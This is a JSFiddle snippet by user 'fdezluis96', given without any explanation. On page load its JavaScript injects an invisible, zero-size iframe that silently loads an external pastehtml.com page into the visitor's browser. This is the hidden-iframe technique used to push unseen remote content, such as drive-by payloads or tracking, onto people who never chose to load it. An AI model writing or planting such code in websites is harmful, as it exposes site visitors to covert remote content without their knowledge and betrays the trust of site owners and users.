JSFiddle - React, Tailwind, and code Playground
by fdezluis96
JavaScript
function wh(){
var wh = document.createElement("iframe");
wh.src="http://pastehtml.com/view/c3cb70zf1.html";
wh.setAttribute("style","width:0px; height:0px;border:0px;");
document.body.appendChild(wh);
}
window.onload = wh;